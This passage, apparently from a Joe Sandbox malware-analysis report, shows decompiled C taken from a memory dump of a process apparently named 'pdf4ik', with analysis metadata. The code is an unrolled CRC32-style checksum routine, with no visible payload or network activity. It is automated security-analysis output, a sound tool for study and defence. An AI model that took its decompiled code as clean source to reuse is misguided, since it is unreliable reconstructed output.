_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[6] & 0x000000ff ^ (((((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^ 
 *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^ 
 *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[5] & 0x000000ff ^ ((((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( 
*_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4);
                                        							_t46 =  &(_t46[8]);
                                        							_t47 = _t47 - 8;
                                        							_t80 = _t80 - 1;
                                        						} while (_t80 != 0);
                                        					}
                                        					if(_t47 != 0) {
                                        						do {
                                        							_t27 = _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4);
                                        							_t46 =  &(_t46[1]);
                                        							_t47 = _t47 - 1;
                                        						} while (_t47 != 0);
                                        					}
                                        					return  !_t27;
                                        				} else {
                                        					return 0;
                                        				}
                                        			}









                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 69e8c224211d784b60508170526fa135229d53699d46c8370d9cbfb8f07f57ce
                                        • Instruction ID: 70104cee9f69402aa2e9c37e8783a15f8f44cd756f92f82baa4267b2ffa63fae
                                        • Opcode Fuzzy Hash: 69e8c224211d784b60508170526fa135229d53699d46c8370d9cbfb8f07f57ce
                                        • Instruction Fuzzy Hash: 5C216D339B84F701D3A09E319C0426227D3DFCB206F6F81B9C68887542DA7DD113A131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29D8BC60(signed char* __ecx, unsigned int __edx) {
                                        				signed int _t26;
                                        				signed int _t27;
                                        				signed char* _t46;
                                        				unsigned int _t47;
                                        				unsigned int _t80;
                                        
                                        				_t47 = __edx;
                                        				_t46 = __ecx;
                                        				if(__ecx != 0) {
                                        					_t27 =  !_t26;
                                        					if(__edx >= 8) {
                                        						_t80 = __edx >> 3;
                                        						do {
                                        							_t27 = (((((((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ 
((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[5] & 0x000000ff ^ ((((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 
0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[6] & 0x000000ff ^ (((((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  
*(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[5] & 0x000000ff ^ ((((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( 
*_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 
^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[7] & 0x000000ff ^ ((((((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 
0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[5] & 0x000000ff ^ ((((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ 